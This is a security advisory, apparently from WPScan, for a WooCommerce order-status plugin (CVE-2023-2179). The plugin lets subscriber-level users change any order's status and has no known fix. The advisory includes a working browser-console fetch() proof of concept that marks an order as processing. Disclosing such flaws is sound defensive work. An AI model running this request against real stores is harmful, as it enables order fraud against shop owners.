WordPress Plugin Vulnerabilities

WooCommerce Order Status Change Notifier <= 1.1.0 - Subscriber+ Arbitrary Order Status Update

Description

The plugin does not have authorisation and CSRF when updating status orders via an AJAX action available to any authenticated users, which could allow low privilege users such as subscriber to update arbitrary order status, making them paid without actually paying for them for example

Proof of Concept

Run the below command in the developer console of the web browser while being logged in as a subscriber, this will change the status of the order #337 to processing

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wc_osc_update_order_status_comment&method=change_status&order_id=337&status=processing',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

Plugin icon
woocommerce-order-status-change-notifier
No known fix

References

CVE
CVE-2023-2179

Classification

Type
NO AUTHORISATION
OWASP top 10
A5: Broken Access Control
CWE
CWE-862
CVSS
5.4 (medium)

Miscellaneous

Original Researcher
WPScan
Verified
Yes
WPVDB ID
fbc56973-4225-4f44-8c38-d488e57cd551

Timeline

Publicly Published
2023-04-19 (about 1 years ago)
Added
2023-04-19 (about 1 years ago)
Last Updated
2023-04-19 (about 1 years ago)

Other

Published
Title
Published
2023-03-07
Title
Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access in Maintenance Mode
Published
2024-04-05
Title
Responsive Lightbox < 2.4.7 - Information Disclosure
Published
2023-12-26
Title
WC Marketplace < 4.0.24 - Missing Authorization via mvx_save_dashpages
Published
2023-11-01
Title
Funnelforms Free < 3.4.2 - Missing Authorization to Test Email Sending
Published
2024-04-29
Title
Democracy Poll <= 6.0.3 - Missing Authorization